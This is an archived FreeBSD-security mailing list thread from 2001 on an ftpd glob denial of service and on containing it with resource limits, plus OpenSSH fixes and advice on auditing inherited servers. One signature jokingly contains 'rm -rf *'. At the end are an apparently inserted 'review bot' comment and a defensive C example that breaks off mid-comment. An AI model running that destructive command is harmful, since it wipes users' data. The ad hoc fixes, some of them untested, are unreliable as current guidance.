From: Garance A Drosihn Subject: Re: What's vunerable? Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 9:25 AM +0000 3/16/01, Peter McGarvey wrote: >I've just inherited several FreeBSD boxes. The versions range >from 3.2_RELEASE to 4.1_RELEASE. > >On the BSD boxes I already maintain I cvsup and make world on >a monthly basis - or as soon as I see a CERT advisory that I >know relates to something that can bite. But the inherited >boxes need a lot of work, and I cannot guarantee to "The Powers >That Be" that a make world wont break the box. I would buy one new box. Use that to build a new version of one of your existing boxes, and replace that system. If nothing breaks, you're in good shape. If something breaks, you still have the original box to fall back on. Fix whatever breaks until all the pieces are up and working. Then use that box to build the replacement for the next system. Repeat process. I would feel much safer with machines built from scratch, where you know what's on them and how they got that way. Also, if you have a wide variety of systems like that, it is almost certain that at least one of them will "have issues" if you try to just upgrade them in place with the latest buildworld. Not necessarily due to the buildworld process itself, but because you don't know the current state of those machines, and you don't know what customizations have been done and why they were done. 
-- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:29:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id C21B337B718 for ; Fri, 16 Mar 2001 10:29:20 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8199 invoked by uid 1000); 16 Mar 2001 18:28:37 -0000 Date: Fri, 16 Mar 2001 20:28:37 +0200 
From: Peter Pentchev To: Anil Jangity Cc: freebsd-security@freebsd.org Subject: Re: Multiple vendors FTP denial of service Message-ID: <20010316202837.C428@ringworld.oblivion.bg> Mail-Followup-To: Anil Jangity , freebsd-security@freebsd.org References: <20010315215913.A70990@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from aj@entic.net on Fri, Mar 16, 2001 at 08:39:07AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 08:39:07AM -0800, Anil Jangity wrote: > Kris/All, > > FTPD is run as root (atleast on my machine). I don't want to limit root > resources, since I am not sure exactly what a good ball park figure for > root would be... > > I looked in ftpd(8) for some way to make it run as another user (atleast > after it starts up) but no luck. > > So, my question is, how do you propose we resource limit ftpd as you > suggest via login.conf? It might not be easy to do this via login.conf; if you are running your ftpd via inetd, though, you can use /usr/bin/limits to do that: ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l ..or you could make an ftpd wrapper: #!/bin/sh ulimit -d 10240 exec /usr/libexec/ftpd -l Having said that, I, too, haven't tested whether setting resource limits eliminates the original problem. G'luck, Peter -- The rest of this sentence is written in Thailand, on > @ I'm pretty sure (but haven't tested) that resource limits will prevent > @ this problem. Your ftpd shouldn't be using large amount of memory > @ under normal operating procedures, so you can set those to reasonable > @ values and not suffer any ill effects. 
> @ > @ Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:33:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 5EC0237B71A for ; Fri, 16 Mar 2001 10:33:21 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8263 invoked by uid 1000); 16 Mar 2001 18:32:38 -0000 Date: Fri, 16 Mar 2001 20:32:38 +0200 
From: Peter Pentchev To: James Snow Cc: Kris Kennaway , Brooks Davis , Alex Popa , security@FreeBSD.ORG Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010316203238.A8245@ringworld.oblivion.bg> Mail-Followup-To: James Snow , Kris Kennaway , Brooks Davis , Alex Popa , security@FreeBSD.ORG References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316125532.A65814@teardrop.org>; from snow@teardrop.org on Fri, Mar 16, 2001 at 12:55:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 12:55:32PM -0500, James Snow wrote: > > The problematic code is in src/crypto/openssh/auth2.c in > input_userauth_request: I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD, committed a similar fix earlier today :) G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:34:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id 3D08E37B719 for ; Fri, 16 Mar 2001 10:34:39 -0800 (PST) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-213-168-73-160.netcologne.de [213.168.73.160]) by mr200.netcologne.de (Mirapoint) with ESMTP id ACP70358; Fri, 16 Mar 2001 19:34:36 +0100 (CET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GIYMY15665; Fri, 16 Mar 2001 19:34:22 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Fri, 16 Mar 2001 19:34:22 +0100 (CET) 
From: Paul Herman To: Anil Jangity Cc: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Mar 2001, Anil Jangity wrote: > FTPD is run as root (at least on my machine). I don't want to limit root > resources, since I am not sure exactly what a good ball park figure for > root would be... The resources are set for the user who logged in through ftp. ftpd (root) does a seteuid() to the user and then sets the resource limits. So, unless you login as root over ftp, you just set limits on the user. Too bad a setusercontext() call couldn't be easily implemented inside of set[e]uid() (it's in -lutil, not -lc). I see too many FreeBSD admins that believe that their proftpds and qmails are protected by the limits set in /etc/login.conf. -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:35:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 30D7137B718 for ; Fri, 16 Mar 2001 10:35:38 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8327 invoked by uid 1000); 16 Mar 2001 18:34:55 -0000 Date: Fri, 16 Mar 2001 20:34:55 +0200 
From: Peter Pentchev
To: Anil Jangity
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316203455.B8245@ringworld.oblivion.bg>
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>

On Fri, Mar 16, 2001 at 08:28:37PM +0200, Peter Pentchev wrote:
[snip]
> ..or you could make an ftpd wrapper:
>
> #!/bin/sh
> ulimit -d 10240
> exec /usr/libexec/ftpd -l

This could even do something like:

exec /usr/libexec/ftpd $*

so it passes to ftpd the arguments it got from inetd, not the hardcoded -l.

G'luck,
Peter

-- 
Do you think anybody has ever had *precisely this thought* before?

From owner-freebsd-security Fri Mar 16 10:39:22 2001
Date: Fri, 16 Mar 2001 19:39:08 +0100 (CET)
From: Paul Herman
To: Peter Pentchev
Cc: Anil Jangity
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>

Hi Peter,

On Fri, 16 Mar 2001, Peter Pentchev wrote:

> It might not be easy to do this via login.conf; if you are running your
> ftpd via inetd, though, you can use /usr/bin/limits to do that:
>
> ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l

ftp stream tcp nowait root/login.class /usr/libexec/ftpd ftpd -l

(where login.class is in /etc/login.conf) will also do the trick.

> Having said that, I, too, haven't tested whether setting resource
> limits eliminates the original problem.

It seems to when the CPU is limited, but as shown in a previous mail,
apparently not when the memory is. Hmmm...

-Paul.

From owner-freebsd-security Fri Mar 16 10:40:11 2001
Date: Fri, 16 Mar 2001 13:40:01 -0500 (EST)
From: Garrett Wollman
Message-Id: <200103161840.NAA61437@khavrinen.lcs.mit.edu>
To: Peter Pentchev
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316203455.B8245@ringworld.oblivion.bg>

< said:

> This could even do something like:
> exec /usr/libexec/ftpd $*

Make that:

exec /usr/libexec/ftpd ${1+"$@"}

(Unlikely to be necessary in the case of ftpd, but that's the correct way
in general.)

-GAWollman

From owner-freebsd-security Fri Mar 16 10:43:12 2001
Date: Fri, 16 Mar 2001 07:15:12 -0800
From: Ron 'The InSaNe One' Rosson
To: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316071511.A46313@lunatic.oneinsane.net>
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>

Kris Kennaway (kris@obsecurity.org) wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > > ---Mike
> > >
> >
> > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes. This was an ftp connection with a regular username and
> > password, in an average home directory.
>
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem. Your ftpd shouldn't be using a large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.
>
> Kris

But, by default are the resource limits set properly to avoid this out of
the box? Or does one have to make the mod themselves?

TIA

-- 
------------------------------------------------------------------------------
Ron Rosson                                    ... and a UNIX user said ...
The InSaNe One                                         rm -rf *
insane@oneinsane.net                       and all was /dev/null and *void()
------------------------------------------------------------------------------
daemon(n): 1. an attendant power or spirit : GENIUS
           2. the cute little mascot of the FreeBSD operating system

From owner-freebsd-security Fri Mar 16 10:50:22 2001
Date: Fri, 16 Mar 2001 10:55:04 -0800 (PST)
From: mudman
To: Per Christian Henden
Subject: Re: weird error messages (at least I don't understand them)

> arp: unknown hardware address format (0x0800)

Umm, I think someone is just trying to send you a malformed packet in
hopes of knocking your machine down. Not really something to worry about,
I think, if FreeBSD is tossing it out as it does above.

From owner-freebsd-security Fri Mar 16 12:23:30 2001
Date: Fri, 16 Mar 2001 12:23:26 -0800
From: Kris Kennaway
To: Shoichi Sakane, kris@obsecurity.org, freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316122326.A98524@mollari.cthul.hu>
In-Reply-To: <20010316144417.A22302@ringworld.oblivion.bg>

On Fri, Mar 16, 2001 at 02:44:17PM +0200, Peter Pentchev wrote:
> On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > > What I really need to know is what vulnerabilities exist on each box -
> > > > so that I can present the boss with a risk assessment, and make him
> > > > decide if the box stays as is, or gets a make world.
> >
> > > Read the advisories.
> >
> > Why doesn't the maintainer of the openssh port upgrade its version?
> > The current version of the port is openssh 2.2.0, which has some vulnerability.
>
> The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0
> 'port revision' 2. The 'port revision' was bumped twice to indicate
> important security fixes. The 'some vulnerability' you are referring to
> is probably the Bleichenbacher attack, which affected nearly all SSH
> servers at the time; a fix was promptly added to the FreeBSD port.
The above is correct, as is noted in the relevant FreeBSD advisory on
OpenSSH :-)

Kris

From owner-freebsd-security Fri Mar 16 12:43:57 2001
Date: Fri, 16 Mar 2001 12:43:54 -0800
From: Kris Kennaway
To: Ashley Penney
Cc: freebsd-security@freebsd.org
Subject: Re: What's vunerable?
Message-ID: <20010316124354.A98989@mollari.cthul.hu>
In-Reply-To: <20010316121158.A17693@daphne.unloved.org>

On Fri, Mar 16, 2001 at 12:11:58PM +0100, Ashley Penney wrote:
> One suggestion I would have is to pop to www.nessus.org, and use the
> scanner they provide. It can output reports in HTML and so forth, with
> pretty graphics for PHBs. However, it can sometimes trigger false
> alarms so I'd run it against the boxes, and check the results by hand.
>
> [I've found this very useful when I suddenly get thrown into 500 boxes,
> all running different versions of OSes.]

Always be careful trusting the results of automated scanners, because they
can never contain a database of ALL known vulnerabilities, so your system
may have other problems than what's noted there. It may be useful as a
backup to make sure you haven't missed anything, though.
Kris

From owner-freebsd-security Fri Mar 16 12:48:15 2001
Date: Fri, 16 Mar 2001 12:48:08 -0800
From: Kris Kennaway
To: Ron 'The InSaNe One' Rosson
Cc: freeBSD-security@freeBSD.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010316124808.B98989@mollari.cthul.hu>
In-Reply-To: <20010316071511.A46313@lunatic.oneinsane.net>

On Fri, Mar 16, 2001 at 07:15:12AM -0800, Ron 'The InSaNe One' Rosson wrote:
> Kris Kennaway (kris@obsecurity.org) wrote:
> > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > > 4.1 from Aug 10th is hurt by it.
> > > >
> > > > ---Mike
> > > >
> > >
> > > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> > > cpu and memory use grows until the kernel runs out of swap space and starts
> > > killing processes. This was an ftp connection with a regular username and
> > > password, in an average home directory.
> >
> > I'm pretty sure (but haven't tested) that resource limits will prevent
> > this problem. Your ftpd shouldn't be using a large amount of memory
> > under normal operating procedures, so you can set those to reasonable
> > values and not suffer any ill effects.
> >
> > Kris
>
> But, by default are the resource limits set properly to avoid this out
> of the box? Or does one have to make the mod themselves?

You have to tune resource limits as appropriate for your local operating
environment.
Kris

From owner-freebsd-security Fri Mar 16 13:02:43 2001
Date: Fri, 16 Mar 2001 22:02:27 +0100 (CET)
From: Paul Herman
To: "ho-sang, yoon"
Cc: Kris Kennaway
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>

On Fri, 16 Mar 2001, ho-sang, yoon wrote:

> $ whoami
> ftp
> $ ulimit -a
> [...]
> data seg size         (kbytes, -d)      524288
> stack size            (kbytes, -s)      65536
> core file size        (512-blocks, -c)  102400
> max memory size       (kbytes, -m)      20480
> locked memory         (kbytes, -l)      10240
> [...]
>
> ---top-----------------------------------------------------------------------
>   PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
>  6379 root      55   0 33360K 33016K RUN      0:40 86.02% 84.67% ftpd
> [cut]
> -----------------------------------------------------------------------------
>
> I don't think that the resource limit has an effect on this matter.
> Or am I doing something wrong?

I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
kicked in, but it didn't. However, what does work is setting the
"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
RLIMIT_DATA.

Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
I'm perusing through sys/vm now...

-Paul.

From owner-freebsd-security Fri Mar 16 13:17:37 2001
Date: Fri, 16 Mar 2001 13:16:48 -0800 (PST)
From: Matt Dillon
Message-Id: <200103162116.f2GLGm674347@earth.backplane.com>
To: Paul Herman
Cc: "ho-sang, yoon", Kris Kennaway
Subject: Re: Multiple vendors FTP denial of service (fwd)

:>
:> I don't think that the resource limit has an effect on this matter.
:> Or am I doing something wrong?
:
:I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
:kicked in, but it didn't. However, what does work is setting the
:"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
:RLIMIT_DATA.
:
:Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
:I'm perusing through sys/vm now...
:
:-Paul.

    The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does
    not apply to mmap(). This is a known issue. In any case, it would
    depend on what ftpd uses. I would expect ftpd to use malloc() for
    internal structures and perhaps mmap() (or sendfile()) when reading
    a file.

    The 'memoryuse' limit (RLIMIT_RSS) only applies to the process's
    in-core size. If the process exceeds this value and the machine is
    loaded down, the kernel will attempt to swap pages out to get the
    process back within the limit. If the machine is mostly idle, the
    kernel ignores this limit.

    Currently we have no resource to limit mmap() use.

                                                -Matt

From owner-freebsd-security Fri Mar 16 17:28:11 2001
Date: Fri, 16 Mar 2001 20:27:37 -0500 (EST)
From: Rob Simmons
To: Anil Jangity
Subject: Re: Multiple vendors FTP denial of service

You can change the user that ftpd runs as in inetd.conf.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 16 Mar 2001, Anil Jangity wrote:

> Kris/All,
>
> FTPD is run as root (at least on my machine). I don't want to limit root
> resources, since I am not sure exactly what a good ball park figure for
> root would be...
>
> I looked in ftpd(8) for some way to make it run as another user (at least
> after it starts up) but no luck.
>
> So, my question is, how do you propose we resource limit ftpd as you
> suggest via login.conf?
>
> Thanks
>
> Anil
>
> @ I'm pretty sure (but haven't tested) that resource limits will prevent
> @ this problem. Your ftpd shouldn't be using a large amount of memory
> @ under normal operating procedures, so you can set those to reasonable
> @ values and not suffer any ill effects.
> @
> @ Kris
> @

From owner-freebsd-security Fri Mar 16 18:06:52 2001
Date: Fri, 16 Mar 2001 21:07:10 -0500
From: aykatsue@netscape.net (Eric Estrella)
To: FreeBSD-security@freebsd.org
Subject: subscribe
Message-ID: <592F8E49.1A2894FF.0096C8D3@netscape.net>

From owner-freebsd-security Fri Mar 16 19:16:15 2001
Date: Fri, 16 Mar 2001 21:37:16 +0100
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010316213716.D20830@speedy.gsinet>
Organization: System Defenestrators Inc.

On Fri, Mar 16, 2001 at 19:34 +0100, Paul Herman wrote:
>
> Too bad a setusercontext() call couldn't be easily implemented
> inside of set[e]uid() (it's in -lutil not -lc). I see too many
> FreeBSD admins that believe that their proftpds and qmails are
> protected by the limits set in /etc/login.conf.

Well, the latter is recommended to be wrapped up in a softlimit(1)
invocation. And the former - as well as any other program - could be
treated the same.

If login.conf isn't easily applied one is still free to make use of
ports/sysutils/daemontools.

virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig    true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Fri Mar 16 23:06:53 2001
Date: Sat, 17 Mar 2001 02:06:06 -0500
Message-Id: <200103170706.CAA08229@mailer.progressive-comp.com>
From: Hank Leininger
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?

On 2001-03-16, Kris Kennaway wrote:

> Always be careful trusting the results of automated scanners, because
> they can never contain a database of ALL known vulnerabilities, so
> your system may have other problems than what's noted there. It may
> be useful as a backup to make sure you haven't missed anything,
> though.

[ I know Kris knows this, just pointing it out... ]

s/known//;

In particular, as other people have pointed out, if you have any reason
to think a box *might* have been compromised, it's not worth your time
(if your goal is to get on with life) to do anything but assume it *has*
been compromised, and start over. There are too many creative ways that
an attacker could have trojan'ed the box once they had free rein for you
to ever[*] be sure you've been thorough enough in checking the box out.
Once a box falls out of a known-good state, it can't really be put back
without starting over, or taking a big chance...

[*] A thorough forensic analysis could tell you that the box definitely
has been, or probably has not been, compromised. The level of certainty
that it hasn't been that you can achieve is directly proportional to how
much time (or money) you have to spend on the investigation. Sounds like
you have little of either, and don't feel like becoming a forensic
expert for the hell of it, so I'd suggest not trying to "prove" to
yourself or anyone else that the box(es) are safe, and just replace
them/do the rolling rebuilds as have been suggested here.
Don't forget to take advantage of this opportunity to remind management
how much time and money, in the long run, a proactive approach can save.
:-P

-- 
Hank Leininger

I say we take off, nuke the site from orbit. Only way to be sure.

From owner-freebsd-security Sat Mar 17 02:40:56 2001
Date: Sat, 17 Mar 2001 11:40:36 +0100 (CET)
From: Paul Herman
To: Gerhard Sittig
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010316213716.D20830@speedy.gsinet>

On Fri, 16 Mar 2001, Gerhard Sittig wrote:

> > Too bad a setusercontext() call couldn't be easily implemented
> > inside of set[e]uid() (it's in -lutil not -lc). I see too many
> > FreeBSD admins that believe that their proftpds and qmails are
> > protected by the limits set in /etc/login.conf.
>
> Well, the latter is recommended to be wrapped up in a
> softlimit(1) invocation. And the former - as well as any other
> program - could be treated the same.
>
> If login.conf isn't easily applied one is still free to make use
> of ports/sysutils/daemontools.

Yes, there are many solutions, most of which have already been posted.
Thing is, even if you created ports/sysutils/cluestick, many admins
would still intuitively believe that limits imposed by /etc/login.conf
apply to all processes. The reality that only a select few daemons use
/etc/login.conf is admittedly counter-intuitive.

Perhaps this is more of a job for TrustedBSD's MAC policies, but it
Would Be Nice if resource limits were set along with (e)uid. What do
others think?

Like I said, this could be done by wrapping setusercontext() into
setuid(), but it starts to get yucky when mixing userland login_cap
functions with a system call. I'd be willing to come up with a patch
for this, if it weren't so darn ugly. Would there be a cleaner way to
do this?

-Paul.
From owner-freebsd-security Sat Mar 17 03:06:02 2001
Date: Sat, 17 Mar 2001 13:05:15 +0200
From: Peter Pentchev
To: Matt Dillon
Cc: Paul Herman, "ho-sang, yoon", freebsd-security@FreeBSD.ORG, Kris Kennaway
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010317130515.A20798@ringworld.oblivion.bg>
In-Reply-To: <200103162116.f2GLGm674347@earth.backplane.com>

On Fri, Mar 16, 2001 at 01:16:48PM -0800, Matt Dillon wrote:
> :>
> :> I don't think that the resource limit has an effect on this matter.
> :> Or am I doing something wrong?
> :
> :I, too, had thought that "max memory size" (or RLIMIT_RSS) would have
> :kicked in, but it didn't. However, what does work is setting the
> :"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds
> :RLIMIT_DATA.
> :
> :Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core.
> :I'm perusing through sys/vm now...
> :
> :-Paul.
>
> The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does
> not apply to mmap(). This is a known issue. In any case, it would depend
> on what ftpd uses. I would expect ftpd to use malloc() for internal
> structures and perhaps mmap() (or sendfile()) when reading a file.
>
> The 'memoryuse' limit (RLIMIT_RSS) only applies to the process's
> in-core size. If the process exceeds this value and the machine is
> loaded down, the kernel will attempt to swap pages out to get the
> process back within the limit. If the machine is mostly idle, the
> kernel ignores this limit.
>
> Currently we have no resource to limit mmap() use.

I think in this case it's important to limit exactly malloc(), and
definitely NOT mmap().
It's glob(3) that's causing this particular DoS, and it (or, in particular,
lib/libc/gen/glob.c's globextend()) uses malloc(). We definitely do not
want to limit the maximum file size that ftpd can transfer - which uses
sendfile(); I do not know where sendfile() gets its limits from, but being
a syscall, it should not be dependent on RLIMIT_DATA. (Well, OK, you
probably know what I mean :)

G'luck,
Peter

--
This sentence no verb.

From owner-freebsd-security Sat Mar 17 05:44:27 2001
Date: Sat, 17 Mar 2001 08:44:21 -0500
From: James Snow
To: Peter Pentchev, freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317084421.A72802@teardrop.org>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg>
In-Reply-To: <20010316203238.A8245@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:32:38PM +0200

On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
>
> I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> committed a similar fix earlier today :)

Cool. Although, I haven't seen it show up in my source tree yet.

Do you know what the fix was?

-Snow

From owner-freebsd-security Sat Mar 17 06:12:41 2001
Date: Sat, 17 Mar 2001 16:11:23 +0200
From: Peter Pentchev
To: James Snow
Cc: freebsd-security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010317161122.B20798@ringworld.oblivion.bg>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg> <20010317084421.A72802@teardrop.org>
In-Reply-To: <20010317084421.A72802@teardrop.org>; from snow@teardrop.org on Sat, Mar 17, 2001 at 08:44:21AM -0500

On Sat, Mar 17, 2001 at 08:44:21AM -0500, James Snow wrote:
> On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote:
> >
> > I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD,
> > committed a similar fix earlier today :)
>
> Cool. Although, I haven't seen it show up in my source tree yet.
>
> Do you know what the fix was?

It has still not shown up in -stable. -current has the fix:

http://www.FreeBSD.org/cgi/cvsweb.cgi/src/crypto/openssh/auth2.c

Take a look at rev. 1.10.

G'luck,
Peter

--
No language can express every thought unambiguously, least of all this one.
From owner-freebsd-security Sat Mar 17 08:21:18 2001
To: Per Christian Henden
Subject: Re: weird error messages (at least I don't understand them)
From: Dag-Erling Smorgrav
Date: 17 Mar 2001 17:21:11 +0100
In-Reply-To: Per Christian Henden's message of "Fri, 16 Mar 2001 10:34:41 +0100 (MET)"

Per Christian Henden writes:
> These entries (or something similar) also appear fairly frequently
> (I replaced my real DNS name with "my.hostname.domain")
>
> Checking for rejected mail hosts:
> 5 malvix.hist.no
> 2 my.hostname.domain
> 2 malvix.hist.no@my.hostname.domain
> 1 1 1 1 1 <@myhostname.domain:kan2na@malvix.hist.no
>
> This looks kinda suspicious to me, what could it mean?

It means malvix.hist.no is looking for an open relay to spam through. If I
were you, I'd check /var/log/maillog* for occurrences of 'malvix', and send
those to abuse@hist.no (or ask the admins at NTNU if they know who's in
charge of HIST)

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sat Mar 17 12:16:12 2001
Date: Sat, 17 Mar 2001 17:46:41 +0100
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Message-ID: <20010317174640.F20830@speedy.gsinet>
References: <20010316213716.D20830@speedy.gsinet>
In-Reply-To: from pherman@frenchfries.net on Sat, Mar 17, 2001 at 11:40:36AM +0100

On Sat, Mar 17, 2001 at 11:40 +0100, Paul Herman wrote:
>
> The reality that only a select few daemons use /etc/login.conf
> is admittedly counter-intuitive. Perhaps this is more of a job
> for TrustedBSD's MAC policies, but it Would Be Nice if resource
> limits were set along with (e)uid. What do others think?
>
> Like I said, this could be done by wrapping setusercontext()
> into setuid(), but it starts to get yucky when mixing userland
> login_cap functions with a system call. I'd be willing to come
> up with a patch for this, if it weren't so darn ugly.
>
> Would there be a cleaner way to do this?

Until there's an agreed upon and clean solution, would a comment at the
top of /etc/login.conf raise attention? Maybe with additional pointers to
alternative solutions (wrapper scripts with ulimit(builtin) and
softlimit(1), accompanying setrlimit(2) calls next to setuid(2) calls)?

--- login.conf 2001/03/17 16:39:33 1.1
+++ login.conf 2001/03/17 16:40:55
@@ -6,6 +6,8 @@
 #
 # This file controls resource limits, accounting limits and
 # default user environment settings.
+# Keep in mind that settings might not always be obeyed
+# when daemons change their identity by means of setuid(2) et al.
 #
 # $FreeBSD: src/etc/login.conf,v 1.34.2.2 2000/06/02 20:53:55 alfred Exp $
 #

virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above ask your parents or an adult to help you.

From owner-freebsd-security Sat Mar 17 16:07:35 2001
Message-ID: <3AB3FC38.94711FFF@bellatlantic.net>
Date: Sat, 17 Mar 2001 19:07:20 -0500
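Review bot: the two added `+#` lines state the symptom ("might not always be obeyed") but not the rule, so a reader still cannot tell which programs honour this file. State the condition Paul gives upthread: these settings are applied only by programs that call setusercontext(3), and a daemon that switches identity with setuid(2) directly never reads login.conf and needs its own setrlimit(2) call beside setuid(2) (or a ulimit/softlimit(1) wrapper, as the reply suggests). Something like `+# Settings here take effect only for programs that call setusercontext(3);` `+# daemons that switch identity with setuid(2) alone never see them.`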
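The workaround the thread suggests for daemons that never call setusercontext(3), as an added example that is not code from the thread or from FreeBSD: apply the data-segment limit with setrlimit(2) right before setuid(2), then probe in a forked child that the cap is still in force after the identity change. The cap and request sizes are constructed sample values, and the names limit_then_drop and probe_datasize are chosen here.

```c
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* By-hand equivalent of login.conf's "datasize" for a daemon that never
 * calls setusercontext(3): cap the data segment, then change identity.
 * Kernel rlimits belong to the process, not the uid, so the cap survives
 * setuid() and the daemon keeps running under it.  Returns 0 or -1. */
int limit_then_drop(rlim_t datasize, uid_t uid, gid_t gid)
{
    struct rlimit rl = { datasize, datasize };
    if (setrlimit(RLIMIT_DATA, &rl) != 0)
        return -1;
    if (setgid(gid) != 0)           /* group first, while still privileged */
        return -1;
    return setuid(uid) == 0 ? 0 : -1;
}

/* Child side of the probe.  Exit codes: 0 cap kept and malloc() worked,
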